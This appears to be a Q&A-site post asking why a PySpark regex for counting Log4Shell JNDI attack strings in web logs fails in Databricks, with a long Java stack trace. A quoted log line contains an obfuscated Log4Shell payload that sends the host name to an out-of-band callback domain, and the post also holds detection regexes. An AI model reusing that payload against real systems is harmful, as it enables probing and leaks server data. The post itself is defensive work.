I'm experimenting with filtering events that contain a log4j attack pattern (${jndi:XXXXXXXX...XXX}) as explained in this post. I tried to filter my PySpark dataframe sdf with a regex inspired by this answer, without success. Let's say I just want to count the logs that contain this type of attack vector. The regex matches and extracts the pattern in Regex101, but it doesn't work in Databricks against the dataframe.
The following is an example:
[24/Mar/2022:10:44:23 +0000] 788.268.113.120 "-" "GET /websso/SAML2/SSO/vsphere.local HTTP/1.1" 403 "-b" 0b 2ms "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" 758.133.55.55 42109 "${jndi:${lower:d}n${lower:s}://${env:hostName}.c8u33s1ij2m0lduqp6v0ce6rzbay86hrk.oast.me}" "${jndi:${lower:d}n${lower:s}://${env:hostName}.c8u33s1ij2m0lduqp6v0ce6rzbay86hrk.oast.me}" - - TLSv1.2 -,-,-
My code is:
from pyspark.sql import functions as F

sdf = spark.read.format("delta").load(INPUT_PATH).filter(f"date >= '{DATE_FROM}' AND date <= '{DATE_TO}'")\
    .filter("response_code == '403'")\
    .filter("http_method == 'GET'")\
    .filter(F.col("raw").rlike(r"([\$]|[\%24]){1,3}(?<suspicious_log4j>([\{]|[\%7B]{1,3}).*[jJnNdDiI]{1,4}.+[lLdDaApPsS]{1,5}.+([\/|\%2F]).+)"))\
    .replace(float('nan'), None)
#display(sdf)
sdf.count()
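To rule out anything specific to my Delta data, I believe the same rlike against a one-row dataframe built from the sample line above should behave the same way (just a sketch I haven't run as such; LOG_LINE is a hypothetical variable holding that sample line):

from pyspark.sql import functions as F

# one-row dataframe with the sample access-log line shown above, in a column named "raw"
sample = spark.createDataFrame([(LOG_LINE,)], ["raw"])

# this count should fail the same way, since the pattern itself is what the JVM regex engine rejects
sample.filter(F.col("raw").rlike(
    r"([\$]|[\%24]){1,3}(?<suspicious_log4j>([\{]|[\%7B]{1,3}).*[jJnNdDiI]{1,4}.+[lLdDaApPsS]{1,5}.+([\/|\%2F]).+)"
)).count()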
I get the following error:
java.util.regex.PatternSyntaxException: named capturing group is missing trailing '>' near index 31
---------------------------------------------------------------------------
Py4JJavaError Traceback (most recent call last)
<command-2117761329875990> in <module>
5 .replace(float('nan'), None)
6 #display(sdf)
----> 7 sdf.count()
/databricks/spark/python/pyspark/sql/dataframe.py in count(self)
686 2
687 """
--> 688 return int(self._jdf.count())
689
690 def collect(self):
/databricks/spark/python/lib/py4j-0.10.9.1-src.zip/py4j/java_gateway.py in __call__(self, *args)
1302
1303 answer = self.gateway_client.send_command(command)
-> 1304 return_value = get_return_value(
1305 answer, self.gateway_client, self.target_id, self.name)
1306
/databricks/spark/python/pyspark/sql/utils.py in deco(*a, **kw)
115 def deco(*a, **kw):
116 try:
--> 117 return f(*a, **kw)
118 except py4j.protocol.Py4JJavaError as e:
119 converted = convert_exception(e.java_exception)
/databricks/spark/python/lib/py4j-0.10.9.1-src.zip/py4j/protocol.py in get_return_value(answer, gateway_client, target_id, name)
324 value = OUTPUT_CONVERTER[type](answer[2:], gateway_client)
325 if answer[1] == REFERENCE_TYPE:
--> 326 raise Py4JJavaError(
327 "An error occurred while calling {0}{1}{2}.\n".
328 format(target_id, ".", name), value)
Py4JJavaError: An error occurred while calling o2028.count.
: java.util.regex.PatternSyntaxException: named capturing group is missing trailing '>' near index 31
([\$]|[\%24]){1,3}(?<suspicious_log4j>([\{]|[\%7B]{1,3}).*[jJnNdDiI]{1,4}.+[lLdDaApPsS]{1,5}.+([\/|\%2F]).+)
^
at java.util.regex.Pattern.error(Pattern.java:1969)
at java.util.regex.Pattern.groupname(Pattern.java:2813)
at java.util.regex.Pattern.group0(Pattern.java:2858)
at java.util.regex.Pattern.sequence(Pattern.java:2065)
at java.util.regex.Pattern.expr(Pattern.java:2010)
at java.util.regex.Pattern.compile(Pattern.java:1702)
at java.util.regex.Pattern.<init>(Pattern.java:1352)
at java.util.regex.Pattern.compile(Pattern.java:1028)
at com.databricks.sql.expressions.codegen.EdgeExpressionCodegen$.doGenCode(EdgeExpressionCodegen.scala:1005)
at com.databricks.sql.expressions.codegen.EdgeExpressionCodegen$.genCode(EdgeExpressionCodegen.scala:145)
at com.databricks.sql.expressions.codegen.EdgeExpressionCodegen$.$anonfun$genCodeWithFallback$1(EdgeExpressionCodegen.scala:264)
at scala.Option.getOrElse(Option.scala:189)
at com.databricks.sql.expressions.codegen.EdgeExpressionCodegen$.genCodeWithFallback(EdgeExpressionCodegen.scala:264)
at org.apache.spark.sql.catalyst.expressions.codegen.CodegenContext.generateExpression(CodeGenerator.scala:1441)
at org.apache.spark.sql.execution.FilterExec.genPredicate$2(basicPhysicalOperators.scala:269)
at org.apache.spark.sql.execution.FilterExec.$anonfun$doConsume$4(basicPhysicalOperators.scala:319)
at scala.collection.TraversableLike.$anonfun$map$1(TraversableLike.scala:286)
at scala.collection.mutable.ResizableArray.foreach(ResizableArray.scala:62)
at scala.collection.mutable.ResizableArray.foreach$(ResizableArray.scala:55)
at scala.collection.mutable.ArrayBuffer.foreach(ArrayBuffer.scala:49)
at scala.collection.TraversableLike.map(TraversableLike.scala:286)
at scala.collection.TraversableLike.map$(TraversableLike.scala:279)
at scala.collection.AbstractTraversable.map(Traversable.scala:108)
at org.apache.spark.sql.execution.FilterExec.doConsume(basicPhysicalOperators.scala:294)
at org.apache.spark.sql.execution.CodegenSupport.consume(WholeStageCodegenExec.scala:197)
at org.apache.spark.sql.execution.CodegenSupport.consume$(WholeStageCodegenExec.scala:152)
at org.apache.spark.sql.execution.ColumnarToRowExec.consume(Columnar.scala:70)
at org.apache.spark.sql.execution.ColumnarToRowExec.doProduce(Columnar.scala:196)
at org.apache.spark.sql.execution.CodegenSupport.$anonfun$produce$1(WholeStageCodegenExec.scala:98)
at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
at org.apache.spark.sql.execution.CodegenSupport.produce(WholeStageCodegenExec.scala:93)
at org.apache.spark.sql.execution.CodegenSupport.produce$(WholeStageCodegenExec.scala:93)
at org.apache.spark.sql.execution.ColumnarToRowExec.produce(Columnar.scala:70)
at org.apache.spark.sql.execution.FilterExec.doProduce(basicPhysicalOperators.scala:255)
at org.apache.spark.sql.execution.CodegenSupport.$anonfun$produce$1(WholeStageCodegenExec.scala:98)
at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
at org.apache.spark.sql.execution.CodegenSupport.produce(WholeStageCodegenExec.scala:93)
at org.apache.spark.sql.execution.CodegenSupport.produce$(WholeStageCodegenExec.scala:93)
at org.apache.spark.sql.execution.FilterExec.produce(basicPhysicalOperators.scala:221)
at org.apache.spark.sql.execution.ProjectExec.doProduce(basicPhysicalOperators.scala:55)
at org.apache.spark.sql.execution.CodegenSupport.$anonfun$produce$1(WholeStageCodegenExec.scala:98)
at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
at org.apache.spark.sql.execution.CodegenSupport.produce(WholeStageCodegenExec.scala:93)
at org.apache.spark.sql.execution.CodegenSupport.produce$(WholeStageCodegenExec.scala:93)
at org.apache.spark.sql.execution.ProjectExec.produce(basicPhysicalOperators.scala:45)
at org.apache.spark.sql.execution.aggregate.AggregateCodegenSupport.doProduceWithoutKeys(AggregateCodegenSupport.scala:361)
at org.apache.spark.sql.execution.aggregate.AggregateCodegenSupport.doProduce(AggregateCodegenSupport.scala:66)
at org.apache.spark.sql.execution.aggregate.AggregateCodegenSupport.doProduce$(AggregateCodegenSupport.scala:64)
at org.apache.spark.sql.execution.aggregate.HashAggregateExec.doProduce(HashAggregateExec.scala:47)
at org.apache.spark.sql.execution.CodegenSupport.$anonfun$produce$1(WholeStageCodegenExec.scala:98)
at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
at org.apache.spark.sql.execution.CodegenSupport.produce(WholeStageCodegenExec.scala:93)
at org.apache.spark.sql.execution.CodegenSupport.produce$(WholeStageCodegenExec.scala:93)
at org.apache.spark.sql.execution.aggregate.HashAggregateExec.produce(HashAggregateExec.scala:47)
at org.apache.spark.sql.execution.WholeStageCodegenExec.doCodeGen(WholeStageCodegenExec.scala:659)
at org.apache.spark.sql.execution.WholeStageCodegenExec.doExecute(WholeStageCodegenExec.scala:722)
at org.apache.spark.sql.execution.SparkPlan.$anonfun$execute$1(SparkPlan.scala:224)
at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
at org.apache.spark.sql.execution.SparkPlan.execute(SparkPlan.scala:220)
at org.apache.spark.sql.execution.exchange.ShuffleExchangeExec.inputRDD$lzycompute(ShuffleExchangeExec.scala:152)
at org.apache.spark.sql.execution.exchange.ShuffleExchangeExec.inputRDD(ShuffleExchangeExec.scala:152)
at org.apache.spark.sql.execution.exchange.ShuffleExchangeExec.mapOutputStatisticsFuture$lzycompute(ShuffleExchangeExec.scala:157)
at org.apache.spark.sql.execution.exchange.ShuffleExchangeExec.mapOutputStatisticsFuture(ShuffleExchangeExec.scala:156)
at org.apache.spark.sql.execution.exchange.ShuffleExchangeLike.$anonfun$submitShuffleJob$1(ShuffleExchangeExec.scala:73)
at org.apache.spark.sql.execution.SparkPlan.$anonfun$executeQuery$1(SparkPlan.scala:268)
at org.apache.spark.rdd.RDDOperationScope$.withScope(RDDOperationScope.scala:165)
at org.apache.spark.sql.execution.SparkPlan.executeQuery(SparkPlan.scala:264)
at org.apache.spark.sql.execution.exchange.ShuffleExchangeLike.submitShuffleJob(ShuffleExchangeExec.scala:73)
at org.apache.spark.sql.execution.exchange.ShuffleExchangeLike.submitShuffleJob$(ShuffleExchangeExec.scala:72)
at org.apache.spark.sql.execution.exchange.ShuffleExchangeExec.submitShuffleJob(ShuffleExchangeExec.scala:132)
at org.apache.spark.sql.execution.adaptive.ShuffleQueryStageExec.shuffleFuture$lzycompute(QueryStageExec.scala:268)
at org.apache.spark.sql.execution.adaptive.ShuffleQueryStageExec.shuffleFuture(QueryStageExec.scala:268)
at org.apache.spark.sql.execution.adaptive.ShuffleQueryStageExec.doMaterialize(QueryStageExec.scala:270)
at org.apache.spark.sql.execution.adaptive.QueryStageExec.materialize(QueryStageExec.scala:123)
at org.apache.spark.sql.execution.adaptive.AdaptiveSparkPlanExec.$anonfun$getFinalPhysicalPlan$5(AdaptiveSparkPlanExec.scala:394)
at org.apache.spark.sql.execution.adaptive.AdaptiveSparkPlanExec.$anonfun$getFinalPhysicalPlan$5$adapted(AdaptiveSparkPlanExec.scala:392)
at scala.collection.Iterator.foreach(Iterator.scala:943)
at scala.collection.Iterator.foreach$(Iterator.scala:943)
at scala.collection.AbstractIterator.foreach(Iterator.scala:1431)
at scala.collection.IterableLike.foreach(IterableLike.scala:74)
at scala.collection.IterableLike.foreach$(IterableLike.scala:73)
at scala.collection.AbstractIterable.foreach(Iterable.scala:56)
at org.apache.spark.sql.execution.adaptive.AdaptiveSparkPlanExec.$anonfun$getFinalPhysicalPlan$1(AdaptiveSparkPlanExec.scala:392)
at org.apache.spark.sql.SparkSession.withActive(SparkSession.scala:958)
at org.apache.spark.sql.execution.adaptive.AdaptiveSparkPlanExec.getFinalPhysicalPlan(AdaptiveSparkPlanExec.scala:364)
at org.apache.spark.sql.execution.adaptive.AdaptiveSparkPlanExec.withFinalPlanUpdate(AdaptiveSparkPlanExec.scala:496)
at org.apache.spark.sql.execution.ResultCacheManager.computeResult(ResultCacheManager.scala:594)
at org.apache.spark.sql.execution.ResultCacheManager.$anonfun$getOrComputeResultInternal$1(ResultCacheManager.scala:542)
at scala.Option.getOrElse(Option.scala:189)
at org.apache.spark.sql.execution.ResultCacheManager.getOrComputeResultInternal(ResultCacheManager.scala:541)
at org.apache.spark.sql.execution.ResultCacheManager.getOrComputeResult(ResultCacheManager.scala:438)
at org.apache.spark.sql.execution.ResultCacheManager.getOrComputeResult(ResultCacheManager.scala:417)
at org.apache.spark.sql.execution.SparkPlan.executeCollectResult(SparkPlan.scala:422)
at org.apache.spark.sql.execution.SparkPlan.executeCollect(SparkPlan.scala:398)
at org.apache.spark.sql.Dataset.$anonfun$count$1(Dataset.scala:3160)
at org.apache.spark.sql.Dataset.$anonfun$count$1$adapted(Dataset.scala:3159)
at org.apache.spark.sql.Dataset.$anonfun$withAction$1(Dataset.scala:3901)
at org.apache.spark.sql.execution.SQLExecution$.$anonfun$withCustomExecutionEnv$5(SQLExecution.scala:196)
at org.apache.spark.sql.execution.SQLExecution$.withSQLConfPropagated(SQLExecution.scala:343)
at org.apache.spark.sql.execution.SQLExecution$.$anonfun$withCustomExecutionEnv$1(SQLExecution.scala:148)
at org.apache.spark.sql.SparkSession.withActive(SparkSession.scala:958)
at org.apache.spark.sql.execution.SQLExecution$.withCustomExecutionEnv(SQLExecution.scala:115)
at org.apache.spark.sql.execution.SQLExecution$.withNewExecutionId(SQLExecution.scala:293)
at org.apache.spark.sql.Dataset.withAction(Dataset.scala:3899)
at org.apache.spark.sql.Dataset.count(Dataset.scala:3159)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at py4j.reflection.MethodInvoker.invoke(MethodInvoker.java:244)
at py4j.reflection.ReflectionEngine.invoke(ReflectionEngine.java:380)
at py4j.Gateway.invoke(Gateway.java:295)
at py4j.commands.AbstractCommand.invokeMethod(AbstractCommand.java:132)
at py4j.commands.CallCommand.execute(CallCommand.java:79)
at py4j.GatewayConnection.run(GatewayConnection.java:251)
at java.lang.Thread.run(Thread.java:748)
I found some workarounds, like here. Hoping to learn from the regex masters, or from anyone who has input on this :)
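For completeness, the kind of crude fallback I have in mind would look roughly like this; it only catches a literal ${jndi prefix or its URL-encoded form %24%7Bjndi, so it misses the more heavily obfuscated payloads, but at least the pattern should compile (again, just a sketch):

from pyspark.sql import functions as F

# crude fallback: flag rows whose raw line contains "${jndi" or "%24%7Bjndi" (case-insensitive)
crude = spark.read.format("delta").load(INPUT_PATH)\
    .filter(f"date >= '{DATE_FROM}' AND date <= '{DATE_TO}'")\
    .filter(F.col("raw").rlike(r"(?i)(\$\{|%24%7B)\s*jndi"))
crude.count()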